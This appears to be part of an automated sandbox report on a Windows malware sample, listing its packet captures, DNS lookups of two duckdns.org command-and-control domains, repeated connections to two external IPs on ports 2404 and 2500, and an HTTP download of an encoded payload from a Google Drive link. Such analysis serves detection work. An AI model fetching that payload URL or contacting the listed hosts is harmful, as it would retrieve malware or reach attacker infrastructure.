                                                                          Nov 26, 2024 08:25:39.504216909 CET498312404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:39.504257917 CET498312404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:39.505045891 CET498372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:39.624311924 CET240449831162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:25:39.624974012 CET250049837192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:25:39.625083923 CET498372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:39.625415087 CET498372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:39.745521069 CET250049837192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:25:50.114430904 CET250049837192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:25:50.120338917 CET498372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:50.123337984 CET498372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:50.243386030 CET250049837192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:25:51.139969110 CET498622404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:51.260154963 CET240449862162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:25:51.260325909 CET498622404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:51.267855883 CET498622404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:51.393872023 CET240449862162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:25:53.379637957 CET240449862162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:25:53.380307913 CET498622404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:53.380383015 CET498622404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:25:53.381407022 CET498682500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:53.500530005 CET240449862162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:25:53.501815081 CET250049868192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:25:53.501908064 CET498682500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:53.502242088 CET498682500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:25:53.622124910 CET250049868192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:03.969006062 CET250049868192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:03.972276926 CET498682500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:03.972306013 CET498682500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:04.092209101 CET250049868192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:04.983799934 CET498942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:05.103940010 CET240449894162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:05.104024887 CET498942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:05.104315042 CET498942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:05.224194050 CET240449894162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:07.192466021 CET240449894162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:07.192537069 CET498942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:07.192590952 CET498942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:07.193416119 CET499002500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:07.312814951 CET240449894162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:07.313508034 CET250049900192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:07.313595057 CET499002500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:07.313945055 CET499002500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:07.436224937 CET250049900192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:17.884931087 CET250049900192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:17.884991884 CET499002500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:17.885056019 CET499002500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:18.005150080 CET250049900192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:18.890136957 CET499272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:19.010164976 CET240449927162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:19.010238886 CET499272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:19.010689974 CET499272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:19.131272078 CET240449927162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:21.083400965 CET240449927162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:21.083482981 CET499272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:21.083514929 CET499272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:21.084374905 CET499332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:21.203413010 CET240449927162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:21.204266071 CET250049933192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:21.204343081 CET499332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:21.204631090 CET499332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:21.324713945 CET250049933192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:31.842252016 CET250049933192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:31.844341993 CET499332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:31.844379902 CET499332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:31.964720011 CET250049933192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:33.199557066 CET499612404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:33.319616079 CET240449961162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:33.319691896 CET499612404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:33.321104050 CET499612404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:33.441006899 CET240449961162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:35.395757914 CET240449961162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:35.396008968 CET499612404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:35.396056890 CET499612404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:35.516081095 CET240449961162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:35.739696980 CET499672500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:35.859914064 CET250049967192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:35.860009909 CET499672500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:35.870577097 CET499672500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:35.990586042 CET250049967192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:46.530181885 CET250049967192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:46.530251980 CET499672500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:46.530342102 CET499672500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:46.650280952 CET250049967192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:47.546089888 CET499942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:47.666970015 CET240449994162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:47.667062044 CET499942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:47.667526960 CET499942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:47.787908077 CET240449994162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:49.827797890 CET240449994162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:49.827874899 CET499942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:49.827965021 CET499942404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:26:49.828865051 CET500012500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:49.947954893 CET240449994162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:26:49.948838949 CET250050001192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:26:49.948915005 CET500012500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:49.949304104 CET500012500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:26:50.069253922 CET250050001192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:00.429754019 CET250050001192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:00.432509899 CET500012500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:00.432509899 CET500012500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:00.552567959 CET250050001192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:01.437588930 CET500272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:01.557683945 CET240450027162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:01.557775974 CET500272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:01.572309017 CET500272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:01.692383051 CET240450027162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:03.671451092 CET240450027162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:03.671679974 CET500272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:03.671722889 CET500272404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:03.672947884 CET500292500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:03.792000055 CET240450027162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:03.792929888 CET250050029192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:03.796391964 CET500292500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:03.796689987 CET500292500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:03.916863918 CET250050029192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:14.413239956 CET250050029192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:14.413310051 CET500292500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:14.413404942 CET500292500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:14.533529043 CET250050029192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:15.421591997 CET500302404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:15.544492006 CET240450030162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:15.545690060 CET500302404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:15.546499968 CET500302404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:15.666562080 CET240450030162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:17.631072044 CET240450030162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:17.631176949 CET500302404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:17.631237030 CET500302404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:17.632133007 CET500312500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:17.751744986 CET240450030162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:17.752424002 CET250050031192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:17.752501965 CET500312500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:17.753207922 CET500312500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:17.873414040 CET250050031192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:28.393624067 CET250050031192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:28.394455910 CET500312500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:28.394511938 CET500312500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:28.515731096 CET250050031192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:29.405996084 CET500322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:29.526554108 CET240450032162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:29.526721001 CET500322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:29.527065992 CET500322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:29.647208929 CET240450032162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:31.687556028 CET240450032162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:31.688430071 CET500322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:31.688471079 CET500322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:31.689259052 CET500332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:31.808620930 CET240450032162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:31.809212923 CET250050033192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:31.809452057 CET500332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:31.809755087 CET500332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:31.929672003 CET250050033192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:42.322530031 CET250050033192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:42.322686911 CET500332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:42.325243950 CET500332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:42.445156097 CET250050033192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:43.661381006 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:43.781621933 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:43.781816006 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:43.782138109 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:43.902487993 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:45.937896013 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:45.938127041 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:45.938298941 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:46.058321953 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:46.277206898 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:46.397275925 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:46.397562027 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:46.398617983 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:46.518649101 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:56.973836899 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:56.974093914 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:56.974169016 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:57.094410896 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:57.983916044 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:58.104279995 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:58.104402065 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:58.104666948 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:58.225984097 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:28:00.194520950 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:28:00.194704056 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:28:00.194806099 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:28:00.195892096 CET500372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:28:00.315110922 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:28:00.316067934 CET250050037192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:28:00.316210985 CET500372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:28:00.316674948 CET500372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:28:00.436868906 CET250050037192.169.69.26192.168.2.4

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 26, 2024 08:24:01.337704897 CET5303153192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:24:01.484606028 CET53530311.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:24:12.162224054 CET5191853192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:24:12.492541075 CET53519181.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:24:14.738217115 CET6261253192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:24:15.058990955 CET53626121.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:25:22.483184099 CET5122853192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:25:22.817589998 CET53512281.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:25:25.186323881 CET5043953192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:25:25.514955044 CET53504391.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:26:32.867512941 CET6323653192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:26:33.198033094 CET53632361.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:26:35.396862984 CET6014653192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:26:35.737951040 CET53601461.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:27:43.327270031 CET5791253192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:27:43.660022974 CET53579121.1.1.1192.168.2.4
                                                                          Nov 26, 2024 08:27:45.939819098 CET5038653192.168.2.41.1.1.1
                                                                          Nov 26, 2024 08:27:46.275398970 CET53503861.1.1.1192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 26, 2024 08:24:01.337704897 CET192.168.2.41.1.1.10x4c46Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:24:12.162224054 CET192.168.2.41.1.1.10xdc4eStandard query (0)ogcmaw.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:24:14.738217115 CET192.168.2.41.1.1.10xb423Standard query (0)emberluck.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:25:22.483184099 CET192.168.2.41.1.1.10x1aa7Standard query (0)ogcmaw.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:25:25.186323881 CET192.168.2.41.1.1.10x8115Standard query (0)emberluck.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:26:32.867512941 CET192.168.2.41.1.1.10x9912Standard query (0)ogcmaw.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:26:35.396862984 CET192.168.2.41.1.1.10x8039Standard query (0)emberluck.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:27:43.327270031 CET192.168.2.41.1.1.10x481dStandard query (0)ogcmaw.duckdns.orgA (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:27:45.939819098 CET192.168.2.41.1.1.10x2194Standard query (0)emberluck.duckdns.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 26, 2024 08:24:01.484606028 CET1.1.1.1192.168.2.40x4c46No error (0)drive.usercontent.google.com142.250.181.33A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:24:12.492541075 CET1.1.1.1192.168.2.40xdc4eNo error (0)ogcmaw.duckdns.org162.216.243.15A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:24:15.058990955 CET1.1.1.1192.168.2.40xb423No error (0)emberluck.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:24:18.646061897 CET1.1.1.1192.168.2.40xedeaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:24:18.646061897 CET1.1.1.1192.168.2.40xedeaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:25:22.817589998 CET1.1.1.1192.168.2.40x1aa7No error (0)ogcmaw.duckdns.org162.216.243.15A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:25:25.514955044 CET1.1.1.1192.168.2.40x8115No error (0)emberluck.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:26:33.198033094 CET1.1.1.1192.168.2.40x9912No error (0)ogcmaw.duckdns.org162.216.243.15A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:26:35.737951040 CET1.1.1.1192.168.2.40x8039No error (0)emberluck.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:27:43.660022974 CET1.1.1.1192.168.2.40x481dNo error (0)ogcmaw.duckdns.org162.216.243.15A (IP address)IN (0x0001)false
                                                                          Nov 26, 2024 08:27:46.275398970 CET1.1.1.1192.168.2.40x2194No error (0)emberluck.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • drive.usercontent.google.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449731142.250.181.334436608C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-26 07:24:03 UTC207OUTGET /download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                          Host: drive.usercontent.google.com
                                                                          2024-11-26 07:24:06 UTC4918INHTTP/1.1 200 OK
                                                                          Content-Type: application/octet-stream
                                                                          Content-Security-Policy: sandbox
                                                                          Content-Security-Policy: default-src 'none'
                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                          X-Content-Security-Policy: sandbox
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Resource-Policy: same-site
                                                                          X-Content-Type-Options: nosniff
                                                                          Content-Disposition: attachment; filename="247_Bzaszylreyg"
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 1071468
                                                                          Last-Modified: Sun, 15 Sep 2024 23:31:18 GMT
                                                                          X-GUploader-UploadID: AFiumC6dGnfQXA2FDeSIxN3Z4rn54SU8MW3ywVeb3vIwm6z4UKx7PaTcRG1RVYV7RpZAJWek9BQD7g4RbQ
                                                                          Date: Tue, 26 Nov 2024 07:24:06 GMT
                                                                          Expires: Tue, 26 Nov 2024 07:24:06 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Goog-Hash: crc32c=Tmwf0w==
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-11-26 07:24:06 UTC4918INData Raw: 74 4c 79 7a 5a 7a 47 31 76 31 6b 77 49 42 77 6f 4d 44 41 63 4d 69 4d 6a 4c 69 77 6a 4e 42 34 71 4d 53 38 6d 4b 54 41 78 4a 53 63 75 48 53 4d 78 4b 53 41 75 4c 62 53 38 73 32 63 78 74 62 39 5a 57 7a 55 63 4c 6a 55 30 4a 79 30 67 4e 43 4b 30 76 4c 4e 6e 4d 62 57 2f 57 61 6d 5a 6c 5a 47 70 71 5a 57 6e 6a 49 79 6a 70 59 79 64 6b 34 2b 6d 71 49 75 4f 71 61 61 4b 6b 4b 4f 53 6a 4b 61 4f 6d 61 4f 69 71 5a 6d 56 6b 61 6d 70 6c 61 65 4d 6a 4b 4f 6c 6a 4a 32 54 6a 36 61 6f 69 34 36 70 70 6f 71 51 6f 35 4b 4d 70 6f 36 5a 6f 36 4b 70 6d 5a 57 52 71 61 6d 56 70 34 79 4d 6f 36 57 4d 6e 5a 4f 50 70 71 69 4c 6a 71 6d 6d 69 70 43 6a 6b 6f 79 6d 6a 70 6d 6a 6f 71 6d 5a 6c 5a 47 70 71 5a 57 6e 6a 49 79 6a 70 59 79 64 6b 34 2b 6d 71 49 75 4f 71 61 61 4b 6b 4b 4f 53 6a 4b 61
                                                                          Data Ascii: tLyzZzG1v1kwIBwoMDAcMiMjLiwjNB4qMS8mKTAxJScuHSMxKSAuLbS8s2cxtb9ZWzUcLjU0Jy0gNCK0vLNnMbW/WamZlZGpqZWnjIyjpYydk4+mqIuOqaaKkKOSjKaOmaOiqZmVkamplaeMjKOljJ2Tj6aoi46ppoqQo5KMpo6Zo6KpmZWRqamVp4yMo6WMnZOPpqiLjqmmipCjkoymjpmjoqmZlZGpqZWnjIyjpYydk4+mqIuOqaaKkKOSjKa
                                                                          2024-11-26 07:24:06 UTC4861INData Raw: 71 71 4a 6d 78 68 6a 53 42 4f 75 54 72 4c 51 76 6f 50 77 45 43 74 57 63 6e 68 37 46 6a 4e 71 38 75 56 45 38 5a 5a 34 69 32 44 78 6e 43 4a 49 75 36 67 5a 74 74 57 57 49 4e 4e 66 71 55 48 65 6b 2f 6c 49 50 36 4a 63 4b 6e 78 74 69 52 61 41 79 71 75 75 67 33 6a 2f 47 32 6b 58 50 4d 67 4f 49 49 50 38 5a 74 4a 61 5a 38 79 34 6b 39 49 32 63 51 68 50 45 54 36 47 37 50 50 32 68 6b 2b 34 45 37 37 6b 62 64 73 72 57 58 43 4a 2f 72 45 78 74 7a 51 31 37 4c 72 64 69 6e 33 79 49 71 41 64 70 31 31 69 31 6d 76 34 4f 75 45 65 59 31 75 4f 6a 33 59 51 70 32 55 38 39 69 53 34 4d 58 65 6c 36 51 45 4e 65 74 56 2f 4d 7a 30 4d 42 65 7a 2f 48 51 76 50 42 6c 6e 4b 48 62 50 75 6c 51 58 4b 2f 49 72 42 70 35 5a 44 6e 5a 5a 31 2b 73 68 72 32 75 4d 64 65 79 58 30 4f 44 2f 6c 47 38 67 6d
                                                                          Data Ascii: qqJmxhjSBOuTrLQvoPwECtWcnh7FjNq8uVE8ZZ4i2DxnCJIu6gZttWWINNfqUHek/lIP6JcKnxtiRaAyquug3j/G2kXPMgOIIP8ZtJaZ8y4k9I2cQhPET6G7PP2hk+4E77kbdsrWXCJ/rExtzQ17Lrdin3yIqAdp11i1mv4OuEeY1uOj3YQp2U89iS4MXel6QENetV/Mz0MBez/HQvPBlnKHbPulQXK/IrBp5ZDnZZ1+shr2uMdeyX0OD/lG8gm
